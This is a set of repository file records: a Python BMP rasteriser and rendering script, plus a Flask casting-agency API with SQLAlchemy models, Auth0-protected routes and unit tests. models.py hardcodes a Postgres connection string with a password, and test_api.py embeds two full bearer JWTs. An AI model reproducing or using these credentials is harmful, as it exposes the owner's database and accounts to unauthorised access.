x\n\t\tpcy = self.vp_y + y\n\n\t\t# changes the data of an individual pixel\n\t\tdata = self.image_data[:26 + ((pcy - 1) * (self.width + self.row_padding) + (pcx - 1)) * 4]\n\t\tdata += self.rgbToByte(self.paintRgbRed, self.paintRgbGreen, self.paintRgbBlue)\n\t\tdata += self.image_data[30 + ((pcy - 1) * (self.width + self.row_padding) + (pcx - 1)) * 4:]\n\n\t\tself.image_data = data\n\n\t\treturn 0\n\n\t# Define glColor(). Paint the whole viewport\n\t# returns: 0 on success\n\tdef glVertexPaintVp(self):\n\n\t\tfor y in range(self.vp_height):\n\t\t\tfor x in range(self.vp_width):\n\t\t\t\tself.glVertex(x,y)\n\n\t\treturn 0\n\n\t# Define glViewPort(int, int, int, int). Establish an area of work for the painting process\n\t# returns: 0 on success\n\tdef glViewPort(self, viewport_x, viewport_y, viewport_width, viewport_height):\n\n\t\tself.vp_x = viewport_x\n\t\tself.vp_y = viewport_y\n\t\tself.vp_width = viewport_width\n\t\tself.vp_height = viewport_height\n\n\t\treturn 0\n\n\t# Define rgbToByte(int, int, int). Converts RGB to bytes\n\t# returns: 4 bytes indicating the RGB of a pixel\n\tdef rgbToByte(self, r,g,b):\n\t\tdata = struct.pack('B', b)\n\t\tdata += struct.pack('B', g)\n\t\tdata += struct.pack('B', r)\n\t\tdata += struct.pack('B', 0)\n\n\t\treturn data\n\n\t# Define finish(). Takes the image_data and makes a file out of it with\n\t# a specif name\n\t# returns: 0 on success\n\tdef writeImage(self, fileName):\n\n\t\t# Makes the image file\n\t\timg = open(fileName + \".bmp\", 'wb')\n\t\timg.write(self.image_data)\n\n\t\treturn 0\n\n\tdef get_bmp_processor_info(self):\n\t\treturn \"bmp_processor Version B\"\n\n\tdef get_header_info(self):\n\t\treturn [self.width, self.height,self.bits_per_pixel, self.row_bytes, self.row_padding]\n\n\tdef get_viewport_info(self):\n\t\treturn [slef.viewport_x, self.viewport_y, self.viewport_width, self.viewport_height]\n\n\tdef get_clearColors_info(self):\n\t\treturn [self.clearRgbRed, self.clearRgbGreen, self.clearRgbBlue]\n\n\tdef get_paintColors_info(self):\n\t\treturn [self.paintRgbRed, self.paintRgbGreen, self.paintRgbBlue]\n" }, { "alpha_fraction": 0.6190226078033447, "alphanum_fraction": 0.665790855884552, "avg_line_length": 21.654762268066406, "blob_id": "0ded473310a4cca61178cf7f2140dd91461417ee", "content_id": "7484c8608c9dfe2154511233d7bf973c9c3667af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1903, "license_type": "no_license", "max_line_length": 80, "num_lines": 84, "path": "/SR6.py", "repo_name": "LuisDiego19FV/Graficas-SR6", "src_encoding": "UTF-8", "text": "#SR5\n#Luis Diego Fernandez\n\nimport sys\nimport bmp_processor\nimport numpy as np\n\n# image\nimage = bmp_processor.bmpImage(600,600)\n\nprint(image.get_bmp_processor_info())\n\n#Decide color\nimage.glClearColor(0,0,0)\nimage.glColor(0,0,0)\nimage.glClear()\n\nimage_skeleton = image.glObjReader(\"obj/earth\")\nimage.glLoadTextureImage('obj/earth',2,1)\n\n#Load model\n# pipeline: readImage -> loadTextures -> writeObject\n\ndef lowangle():\n\n print(\"lowangle\")\n\n imageLow = bmp_processor.bmpImage(400,400)\n imageLow.glLoadTextureImage('obj/earth',2,1)\n\n imageLow.glClearColor(0,0,0)\n imageLow.glColor(0,0,0)\n imageLow.glClear()\n\n imageLow.glObjWriter(image_skeleton,700,0.5,0.65,0)\n imageLow.writeImage(\"earth-lowangle\")\n\n print(\"\\n\")\n\ndef mediumshot():\n print(\"mediumshot\")\n\n imageMid = bmp_processor.bmpImage(400,400)\n imageMid.glLoadTextureImage('obj/earth',2,1)\n\n imageMid.glClearColor(0,0,0)\n imageMid.glColor(0,0,0)\n imageMid.glClear()\n\n imageMid.glObjWriter(image_skeleton,600,0.5,0.5,0)\n imageMid.writeImage(\"earth-mediumshot\")\n\n print(\"\\n\")\n\ndef highangle():\n print(\"highangle\")\n\n imageHigh = bmp_processor.bmpImage(400,400)\n imageHigh.glLoadTextureImage('obj/earth',2,1)\n\n imageHigh.glClearColor(0,0,0)\n imageHigh.glColor(0,0,0)\n imageHigh.glClear()\n\n imageHigh.glObjWriter(image_skeleton,1200,0.5,0.25,0)\n imageHigh.writeImage(\"earth-highangle\")\n\n print(\"\\n\")\n\nif len(sys.argv) == 2:\n if str.lower(sys.argv[1]) == \"low\":\n lowangle()\n elif str.lower(sys.argv[1]) == \"mid\":\n mediumshot()\n elif str.lower(sys.argv[1]) == \"high\":\n highangle()\n elif str.lower(sys.argv[1]) == \"all\":\n lowangle()\n mediumshot()\n highangle()\n else:\n print(\"Es necesario un argumento valido, elija: low, mid, high o all\")\nelse:\n print(\"Es necesario uno de los siguientes argumentos: low, mid, high o all\")\n" }, { "alpha_fraction": 0.6137440800666809, "alphanum_fraction": 0.6232227683067322, "avg_line_length": 34.16666793823242, "blob_id": "a2b70bd2698c75cbba38fc8c5e97f3b527fb6c6b", "content_id": "bfda0b3c8b054686b6423825df332a3e3cb18211", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 422, "license_type": "no_license", "max_line_length": 64, "num_lines": 12, "path": "/README.md", "repo_name": "LuisDiego19FV/Graficas-SR6", "src_encoding": "UTF-8", "text": "# Graficas-SR6\nCorrer SR6.py\n\n python3 SR6.py [argumento]\n \n Los posibles argumentos son:\n - low: para crear una imagen con low angle shot\n - mid: para crear una imagen con un mediumshot\n - high: para crear una imagen con un high angle shot\n - all: para crear todas las imagenes anterriores\n \n * se recomienda utilizar all para salir del paso rapido\n" } ]
3
vinnn/FSND_Capstone
https://github.com/vinnn/FSND_Capstone
3d1f1c1c7d2d745321028a74ee6c75a8ae66eb31
d9a5ff3c26ac5388c7a1278f9147e84d0eae9656
c77002608f9c52ef157f2f081964f931c9a236e4
refs/heads/main
2023-08-22T05:37:19.952854
2021-10-16T18:32:17
2021-10-16T18:32:17
409,889,687
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.4518776535987854, "alphanum_fraction": 0.46443670988082886, "avg_line_length": 28.671586990356445, "blob_id": "92f6d15a166cd840f2dcc7f166289fcdd676988f", "content_id": "7c6e9dc477e37ed1053aeacd2ca294f42dd9c027", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8042, "license_type": "no_license", "max_line_length": 138, "num_lines": 271, "path": "/src/api.py", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "#########################################################\n#I# IMPORTS\n#########################################################\n# print('__file__={0:<35} | __name__={1:<25} | __package__={2:<25}'.format(__file__,__name__,str(__package__)))\n\n\nimport os\nfrom flask import Flask, request, jsonify, abort\nfrom sqlalchemy import exc\nimport json\nfrom flask_cors import CORS\n\n#I### Imports from models and auth\n#I# Note: written previously as '.database.models' and '.auth.auth'\nfrom .database.models import db_drop_and_create_all, setup_db, Actor #, Movie\nfrom .auth.auth import AuthError, requires_auth\n\n\n\n#########################################################\n#I# INITIALISATION\n#########################################################\ndef create_app(test_config=None):\n\n\n #########################################################\n #I# INITIALISATION\n #########################################################\n app = Flask(__name__)\n\n\n setup_db(app)\n CORS(app)\n\n\n\n #########################################################\n ## CORS Headers [TO BE CHECKED]\n #########################################################\n # @app.after_request\n # def after_request(response):\n # response.headers.add(\n # 'Access-Control-Allow-Headers',\n # 'Content-Type,Authorization,true')\n # response.headers.add(\n # 'Access-Control-Allow-Methods',\n # 'GET,PUT,POST,DELETE,OPTIONS')\n # return response\n\n\n\n\n\n\n\n #########################################################\n ## DROP ALL RECORDS AND START YOUR DB FROM SCRATCH\n #########################################################\n #db_drop_and_create_all()\n\n #########################################################\n ## ROUTES\n #########################################################\n '''\n endpoint GET /actors\n required permissions: \n 'get: actors'\n returns \n status code 200 and json {\"success\": True, \"actors\": actors}\n or error status code with reason for failure\n '''\n @app.route('/actors', methods=['GET'])\n @requires_auth(permission='get:actors')\n #def get_actors():\n def get_actors(payload):\n try: \n actors = Actor.query.order_by(Actor.id).all()\n actors_array = [actor.todictionary() for actor in actors]\n print(actors_array)\n except:\n abort(422)\n\n return jsonify({\n 'success': True,\n 'actors': actors_array\n }, 200)\n\n\n\n '''\n endpoint POST /actor\n should create a new row in the Actors table\n required permissions: \n 'post: actor'\n returns \n status code 200 and json {\"success\": True, \"actor\": actor} where actor is an array containing only the newly created actor\n or error status code with reason for failure\n '''\n @app.route('/actors', methods=['POST'])\n @requires_auth(permission='post:actors')\n def post_actors(payload):\n #def post_actors():\n try:\n \n body = request.get_json()\n\n new_name = body.get(\"name\", None)\n new_age = body.get(\"age\", None)\n new_gender = body.get(\"gender\", None)\n\n new_actor = Actor(\n name = new_name,\n age = new_age,\n gender = new_gender\n )\n new_actor.insert()\n\n return jsonify({\n 'success': True,\n 'actor': new_actor.todictionary()\n }, 200)\n\n except:\n abort(422)\n\n\n\n '''\n endpoint PATCH /actors/id\n where <id> is the existing actor id\n it should respond with a 404 error if <id> is not found\n it should update the corresponding row for <id>\n required permissions: \n 'patch: actors'\n returns \n status code 200 and json {\"success\": True, \"actor\": actor} where actor an array containing only the updated actor\n or error status code with reason for failure\n '''\n @app.route('/actors/<int:id>', methods=['PATCH'])\n @requires_auth(permission='patch:actors')\n def patch_actors(payload, id):\n #def patch_actors(id):\n \n actor_to_patch = Actor.query.filter(Actor.id == id).one_or_none()\n if actor_to_patch is None:\n abort(404)\n\n try:\n body = request.get_json()\n\n new_name = body.get(\"name\", None)\n new_age = body.get(\"age\", None)\n new_gender = body.get(\"gender\", None)\n\n print(new_name)\n\n if new_name != \"null\":\n actor_to_patch.name = new_name \n if new_age != \"null\":\n actor_to_patch.age = new_age\n if new_gender != \"null\":\n actor_to_patch.gender = new_gender\n\n actor_to_patch.update()\n\n return jsonify({\n 'success': True,\n 'actor': actor_to_patch.todictionary()\n }, 200)\n\n except:\n abort(422, \"bad request etc error description\")\n\n\n\n '''\n endpoint DELETE /actors/id\n where <id> is the existing actor id\n it should respond with a 404 error if <id> is not found\n it should delete the corresponding row for <id>\n required permissions: \n 'delete: actors'\n returns \n status code 200 and json {\"success\": True, \"actor\": actor} where actor an array containing only the deleted actor\n or error status code with reason for failure\n '''\n @app.route('/actors/<int:id>', methods=['DELETE'])\n @requires_auth(permission='delete:actors')\n def delete_actors(payload, id):\n #def delete_actors(id):\n \n actor_to_delete = Actor.query.filter(Actor.id == id).one_or_none()\n if actor_to_delete is None:\n abort(404)\n\n try:\n actor_to_delete.delete()\n\n return jsonify({\n 'success': True,\n 'actor': actor_to_delete.todictionary()\n }, 200)\n\n except:\n abort(422, \"bad request etc error description\")\n\n\n\n #########################################################\n ## Error Handling\n #########################################################\n '''\n Example error handling for unprocessable entity\n '''\n @app.errorhandler(422)\n def unprocessable(error):\n return jsonify({\n \"success\": False, \n \"error\": 422,\n \"message\": \"unprocessable\"\n }), 422\n\n @app.errorhandler(404)\n def not_found(error):\n return jsonify({\n \"success\": False, \n \"error\": 404,\n \"message\": \"resource not found\"\n }), 404\n\n @app.errorhandler(400)\n def bad_request(error):\n return jsonify({\n 'success': False,\n 'error': 400,\n 'message': 'bad request'\n }), 400\n\n @app.errorhandler(405)\n def method_not_allowed(error):\n return jsonify({\n 'success': False,\n 'error': 405,\n 'message': 'method not allowed'\n }), 405\n\n\n\n '''\n @TODO implement error handler for AuthError\n error handler should conform to general task above \n '''\n #@app.errorhandler(AuthError)\n def handle_auth_error(ex):\n '''\n Receive the raised authorization error and include it in the response.\n '''\n response = jsonify(ex.error)\n response.status_code = ex.status_code\n\n return response\n \n \n return app\n\n\napp = create_app()\n\nif __name__ == '__main__':\n #app.run(host='0.0.0.0', port=8080, debug=True)\n app.run()\n\n" }, { "alpha_fraction": 0.49954456090927124, "alphanum_fraction": 0.5103448033332825, "avg_line_length": 34.082191467285156, "blob_id": "fed1d6a31d82ae8ca715a8392430e318bec96143", "content_id": "17001f7b1558a843a1be37a0158ce9898a8506d8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7685, "license_type": "no_license", "max_line_length": 111, "num_lines": 219, "path": "/src/test_api.py", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "# ----------------------------------------------------------------------------#\n# Imports.\n# ----------------------------------------------------------------------------#\n# print('__file__={0:<35} | __name__={1:<25} | __package__={2:<25}'.format(__file__,__name__,str(__package__)))\n\n\nimport os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\nfrom .api import create_app # import the app=Flask(__name__) from api.py\nfrom .database.models import setup_db, Actor # import funtions and models form models.py\n\n\n# ----------------------------------------------------------------------------#\n# Test Class.\n# ----------------------------------------------------------------------------#\nclass CastingTestCase(unittest.TestCase):\n \"\"\"This class represents the Casting test case\"\"\"\n\n # Setup.\n # ----------------------------------------#\n def setUp(self):\n \"\"\"Executed before each test. \n Define test variables and initialize app.\"\"\"\n\n\n # MODIFIED START\n# self.app = create_app()\n# self.client = self.app.test_client\n self.app = create_app()\n self.client = self.app.test_client\n\n# self.database_name = \"casting_test\"\n# self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name) \n self.database_filename = \"database11_test.db\"\n self.project_dir = os.path.dirname(os.path.abspath(__file__))\n self.database_path = \"sqlite:///{}\".format(os.path.join(self.project_dir, self.database_filename))\n# setup_db(self.app, self.database_path)\n setup_db(self.app) #, self.database_path)\n\n\n self.castassistant_jwt = 'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkJUdEl4MFNJZVNLRlpXMkFpbFMxMiJ9.eyJpc3MiOiJodHRwczovL2ZzbmQtY2Fwc3RvbmUtdGVuYW50LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MTVkYTAzZWFmMGM3NTAwNjkxNTZiOGIiLCJhdWQiOiJmc25kLWNhcHN0b25lLWFwaS1pZGVudGlmaWVyIiwiaWF0IjoxNjM0MjA0MDg4LCJleHAiOjE2MzQyOTA0ODgsImF6cCI6IjVEeFBsQ2tPYUdDSWJmUHg2bFlVMXpuaEZqaUVpRnNDIiwic2NvcGUiOiIiLCJwZXJtaXNzaW9ucyI6WyJnZXQ6YWN0b3JzIiwiZ2V0Om1vdmllcyJdfQ.ua1CjrluoPgZDlPKK2UJokTfSeCnGOv5L-4UjZ_fWIp1PclvBZrdTzQdpEIcIpVqOjFgg3AFdIkhUiFcJjoLxDNn77RZMqEOJ2xURG6c-KO-oiTzT_ZJkzUOgw4pB5Bxv_wc60GSEtDUdTXRQ_z4UdmzPdfO1Ire5zGBNM2esodq3lh8bdAsJgV7QGst9t0qyP1xyxJjn2RdYClGIGiIVc_GwMoHwmb0IaSHZWyXBpXYRJ6OuzfLVkQYGUZKE79NmXbq2BXN5MrkK_sNkr2zgrpmJQjKN-9EOPGBdtGVj72lk4tYfZRrWV_rP7_v2cvT4FN9aq9oVHW4BRurrGnk9w'\n\n self.prodexec_jwt = 'eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IkJUdEl4MFNJZVNLRlpXMkFpbFMxMiJ9.eyJpc3MiOiJodHRwczovL2ZzbmQtY2Fwc3RvbmUtdGVuYW50LmV1LmF1dGgwLmNvbS8iLCJzdWIiOiJhdXRoMHw2MTYwMWEyZjVjZDk2YjAwNzAyZDA5NGUiLCJhdWQiOiJmc25kLWNhcHN0b25lLWFwaS1pZGVudGlmaWVyIiwiaWF0IjoxNjM0MjA0ODE0LCJleHAiOjE2MzQyOTEyMTQsImF6cCI6IjVEeFBsQ2tPYUdDSWJmUHg2bFlVMXpuaEZqaUVpRnNDIiwic2NvcGUiOiIiLCJwZXJtaXNzaW9ucyI6WyJkZWxldGU6YWN0b3JzIiwiZGVsZXRlOm1vdmllcyIsImdldDphY3RvcnMiLCJnZXQ6bW92aWVzIiwicGF0Y2g6YWN0b3JzIiwicGF0Y2g6bW92aWVzIiwicG9zdDphY3RvcnMiLCJwb3N0Om1vdmllcyJdfQ.5VDTMXjy7oc_EqXi5ImwygbCVfvb-iEF6fyWxJG2HBwfbjiOZZyRDU431wqsMvy8MElX1Yy79mm3LzRJPa2mA4Mluq3_aMdjwXT4Nz95KzIhlzgrkD32KYUK-NtlIOue-4AEczVQuZPXvFduEe3RvhzKwna4f9G7QMevV1phglE39IkZcNzcZ4cyNLmDYn3aSPIwfMN7r3Ij4_sslcJSM7gTsz_FUVZa9NSxxitc5i5CFimMItZaFUMrxXwP4Xc6V6-67jFj2hENXq_XUtdPKHs23GFeVnK9G-f7NFiFZdo3EiU4gsddQSU8B0HfzS8EmLYlWWCida0FBHxwacawWw'\n\n\n # MODIFIED END\n\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n # creates a new question object, to be used\n # in the POST question tests:\n self.new_actor = {\n 'name': 'Titi?',\n 'age': 40,\n 'gender': 'Male', \n }\n self.update_actor = {\n 'name': 'actor3newname',\n 'age': 100,\n 'gender': 'Male', \n }\n self.new_quiz = {\n 'quiz_category': {'type': 'Geography', 'id': '3'},\n 'previous_questions': []\n }\n\n # Teardown.\n # ----------------------------------------# \n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n # Test. [GET NON-EXISTENT URL => ERROR ]\n # ----------------------------------------# \n def test_404_nonexistent_url(self):\n # Get response by making client make the GET request: \n res = self.client().get('/actors2',\n headers={'Authorization':'Bearer'+ self.castassistant_jwt}\n )\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'resource not found')\n\n # Test. [GET ACTORS => OK ]\n # ----------------------------------------# \n def test_200_get_categories(self):\n # Get response by making client make the GET request:\n res = self.client().get('/actors',\n headers={'Authorization':'Bearer '+ self.castassistant_jwt}\n )\n \n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[0]['success'], True)\n self.assertTrue(data[0]['actors']) # check the result contains 'actors' dictionary\n\n # Test. [DELETE ACTOR id => OK ]\n # ----------------------------------------# \n # def test_200_delete_actor(self):\n # Get response by making client make the DELETE request:\n # res = self.client().delete('/actors/8',\n # headers={'Authorization':'Bearer '+ self.prodexec_jwt}\n # ) \n\n # # Load the data using json.loads:\n # data = json.loads(res.data)\n\n # # check responses:\n # self.assertEqual(res.status_code, 200)\n # self.assertEqual(data[0]['success'], True)\n\n\n # Test. [DELETE NON-EXISTENT ACTOR => ERROR ]\n # ----------------------------------------# \n def test_404_delete_nonexistent_actor(self):\n # Get response by making client make the GET request:\n res = self.client().delete('/actors/2000',\n headers={'Authorization':'Bearer '+ self.prodexec_jwt}\n ) \n # Load the data using json.loads:\n data = json.loads(res.data)\n\n print(\"DATA : \")\n print(data)\n\n # check responses:\n self.assertEqual(res.status_code, 404)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'resource not found')\n\n # Test. [POST ACTOR id => OK ]\n # ----------------------------------------# \n # def test_200_post_actor(self):\n # # Get response by making client make the \n # # POST request (new_question is defined above):\n # res = self.client().post('/actors', \n # json=self.new_actor,\n # headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n # )\n # # Load the data using json.loads:\n # data = json.loads(res.data)\n\n # # check responses:\n # self.assertEqual(res.status_code, 200)\n # self.assertEqual(data[0]['success'], True)\n\n\n # Test. [POST ACTOR WITH NO INFO => ERROR ]\n # ----------------------------------------# \n def test_422_post_wrong_actor_info(self):\n # Get response by making client make the \n # POST request, without json input info:\n res = self.client().post('/actors', \n json='wrongactor',\n headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n )\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n # Test. [PATCH ACTOR id => OK ]\n # ----------------------------------------# \n def test_200_patch_actor(self):\n # Get response by making client make the \n # PATCH request (update_actor is defined above):\n res = self.client().patch('/actors/3', \n json=self.update_actor,\n headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n )\n\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data[0]['success'], True)\n\n\n # Test. [PATCH ACTOR WITH NO INFO => ERROR ]\n # ----------------------------------------# \n def test_422_patch_no_patchdata(self):\n # Get response by making client make the \n # PATCH request, without json input info:\n res = self.client().patch('/actors/3', \n json='wrongpatch',\n headers={'Authorization':'Bearer '+ self.prodexec_jwt} \n )\n\n # Load the data using json.loads:\n data = json.loads(res.data)\n\n # check responses:\n self.assertEqual(res.status_code, 422)\n self.assertEqual(data['success'], False)\n self.assertEqual(data['message'], 'unprocessable')\n\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n\n\n" }, { "alpha_fraction": 0.5010941028594971, "alphanum_fraction": 0.6936542391777039, "avg_line_length": 16.576923370361328, "blob_id": "9bf5ca799e494501474cbe771c91d9a818169137", "content_id": "89d22efede65754b4a013455057e5183f676c2cb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 457, "license_type": "no_license", "max_line_length": 29, "num_lines": 26, "path": "/requirements.txt", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "astroid==2.8.2\nclick==8.0.1\necdsa==0.17.0\nFlask==1.0.2\nFlask-Cors==3.0.8\nFlask-SQLAlchemy==2.4.0\nfuture==0.18.2\ngunicorn==20.1.0\nimportlib-metadata==4.8.1\nisort==4.3.21\nitsdangerous==2.0.1\nJinja2==3.0.1\nlazy-object-proxy==1.6.0\nMarkupSafe==2.0.1\nmccabe==0.6.1\npsycopg2==2.9.1\npycryptodome==3.3.1\npylint==2.3.1\npython-jose-cryptodome==1.3.2\nsix==1.16.0\nSQLAlchemy==1.3.3\ntyped-ast==1.4.3\ntyping-extensions==3.10.0.2\nWerkzeug==2.0.2\nwrapt==1.12.1\nzipp==3.5.0\n" }, { "alpha_fraction": 0.48751312494277954, "alphanum_fraction": 0.5043022036552429, "avg_line_length": 29.729032516479492, "blob_id": "dd7e3012fb6e836f399c0fd70aed1119f739864e", "content_id": "650e1359e6b0f9c9131cdec8e2dd4657e535150d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4765, "license_type": "no_license", "max_line_length": 175, "num_lines": 155, "path": "/src/database/models.py", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "#########################################################\n#I# IMPORTS \n#########################################################\nimport os\nfrom sqlalchemy import Column, String, Integer\nfrom flask_sqlalchemy import SQLAlchemy\nimport json\n\n\n#########################################################\n#I# DATABASE CONFIGURATION\n#########################################################\n\n# SQLITE SETUP ###################################\n# database_filename = \"database11.db\"\n# project_dir = os.path.dirname(os.path.abspath(__file__))\n# database_path = \"sqlite:///{}\".format(os.path.join(project_dir, database_filename))\n# '''\n# use db = SQLAlchemy() + db.init_app(app), instead of db = SQLAlchemy(app)\n# https://flask.palletsprojects.com/en/1.1.x/patterns/appfactories/factories-extensions\n# '''\n# db = SQLAlchemy() \n# '''\n# setup_db(app)\n# binds a flask application and a SQLAlchemy service\n# '''\n# def setup_db(app):\n# app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n# app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n# db.app = app\n# db.init_app(app)\n\n\n# POSTGRES SETUP ###################################\ndatabase_name = \"db_capstone\"\ndatabase_path = \"postgresql://{}/{}\".format('localhost:5432', database_name)\n# postgresql://localhost:5432/db_capstone\n\ndatabase_path = \"postgres://nfkphcncctfhsr:28a0b6b1e059768d27a4f75e8034b9d8dfa36395ca7011c1614f28503974b6ac@ec2-54-195-246-55.eu-west-1.compute.amazonaws.com:5432/d69ah6men0oka\"\n\n\ndb = SQLAlchemy()\n\n\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%% DATABASE_URL : %%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(database_path)\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\nprint(\"%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%\")\n\n'''\nsetup_db(app)\n binds a flask application and a SQLAlchemy service\n'''\ndef setup_db(app, database_path=database_path):\n app.config[\"SQLALCHEMY_DATABASE_URI\"] = database_path\n app.config[\"SQLALCHEMY_TRACK_MODIFICATIONS\"] = False\n db.app = app\n db.init_app(app)\n db.create_all()\n\n\n\n\n\n#########################################################\n\n#########################################################\n'''\ndb_drop_and_create_all()\n drops the database tables and starts fresh\n can be used to initialize a clean database\n !!NOTE you can change the database_filename variable to have multiple versions of a database\n'''\ndef db_drop_and_create_all():\n db.drop_all()\n db.create_all()\n\n\n#########################################################\n\n#########################################################\n'''\nActor\nan actor entity, extends the base SQLAlchemy Model\n'''\nclass Actor(db.Model):\n __tablename__ = 'actors' # table name to be plural, non-capitalized\n # Autoincrementing, unique primary key\n id = Column(Integer().with_variant(Integer, \"sqlite\"), primary_key=True)\n # String Name\n name = Column(String(80), unique=True, nullable=False)\n # String Age\n age = Column(Integer, unique=False, nullable=False)\n # String Gender\n gender = Column(String(80), unique=False, nullable=False)\n\n '''\n todictionary()\n dictionary representation of the model\n ''' \n def todictionary(self):\n return {\n 'name': self.name,\n 'age': self.age,\n 'gender': self.gender\n }\n\n '''\n insert()\n inserts a new model into a database\n the model must have a unique name\n the model must have a unique id or null id\n EXAMPLE\n actor = Actor(name=req_name, age=req_age, gender=req_gender)\n actor.insert()\n '''\n def insert(self):\n db.session.add(self)\n db.session.commit()\n\n '''\n delete()\n deletes a new model into a database\n the model must exist in the database\n EXAMPLE\n actor = Actor(name=req_name, age=req_age)\n actor.delete()\n '''\n def delete(self):\n db.session.delete(self)\n db.session.commit()\n\n '''\n update()\n updates a new model into a database\n the model must exist in the database\n EXAMPLE\n actor = Actor.query.filter(Actor.id == id).one_or_none()\n actor.name = 'James'\n actor.update()\n '''\n def update(self):\n db.session.commit()\n\n\n\n#########################################################\n#I# method to give a readable string representation (for debugging and testing)\n#########################################################\n def __repr__(self):\n return '<name %r>' % self.name\n\n\n" }, { "alpha_fraction": 0.50352942943573, "alphanum_fraction": 0.6941176652908325, "avg_line_length": 16.70833396911621, "blob_id": "6840d18113a78b2aaa3545300ec0da63e6372eb7", "content_id": "9fa95d73b0678fc975f3c05cc6b2ea7eaa1744eb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 425, "license_type": "no_license", "max_line_length": 29, "num_lines": 24, "path": "/src/requirements.txt", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "astroid==2.8.2\nclick==8.0.1\necdsa==0.17.0\nFlask==1.0.2\nFlask-Cors==3.0.8\nFlask-SQLAlchemy==2.4.0\nfuture==0.18.2\nimportlib-metadata==4.8.1\nisort==4.3.21\nitsdangerous==2.0.1\nJinja2==3.0.1\nlazy-object-proxy==1.6.0\nMarkupSafe==2.0.1\nmccabe==0.6.1\npycryptodome==3.3.1\npylint==2.3.1\npython-jose-cryptodome==1.3.2\nsix==1.16.0\nSQLAlchemy==1.3.3\ntyped-ast==1.4.3\ntyping-extensions==3.10.0.2\nWerkzeug==0.15.4\nwrapt==1.12.1\nzipp==3.5.0\n" }, { "alpha_fraction": 0.7386363744735718, "alphanum_fraction": 0.7418830990791321, "avg_line_length": 18.838708877563477, "blob_id": "f38e1bf2403a5f6118bbe2326be47b34e5030bbb", "content_id": "1fcef680d25f50a9f0f0ee69e34ec815229feffe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 616, "license_type": "no_license", "max_line_length": 101, "num_lines": 31, "path": "/src/README.md", "repo_name": "vinnn/FSND_Capstone", "src_encoding": "UTF-8", "text": "README\n\n\n\n\nFor deployment on Heroku:\n\n# install gunicorn\n$ pip3 install gunicorn\n\n# create a requirements.txt\n$ pip3 freeze > requirements.txt\n\n# create file 'Procfile' with content:\nweb: gunicorn \"app:create_app()\"\n\n\n# HEROKU\n# create account\n# install the Heroku CLI\n$ brew tap heroku/brew & brew install heroku\n# login for CLI\n$ heroku login\n+ press any key, this will open the Heroku login page in the browser. Then login. Then CLI logged in.\n\n# create new app on Heroku webpage\ncreate new app/\n\n# Back on CLI:\n# connect your git repository to the heroku new app\n$ heroku git:remote -a fsnd-capstone-app-heroku\n\n" } ]
6
tanmayee30/XML_Prasing
https://github.com/tanmayee30/XML_Prasing
d542949cbc08b54c1963cbae9fd802e118799c45
4aecb33158871714a219cf088f3b75fa04199eac
96b02ece526257cf8f3126778c3cdc62d70314b7
refs/heads/master
2021-05-23T05:34:02.391320
2017-08-11T05:46:37
2017-08-11T05:46:37
95,078,062
0
0
null
null
null
null
null
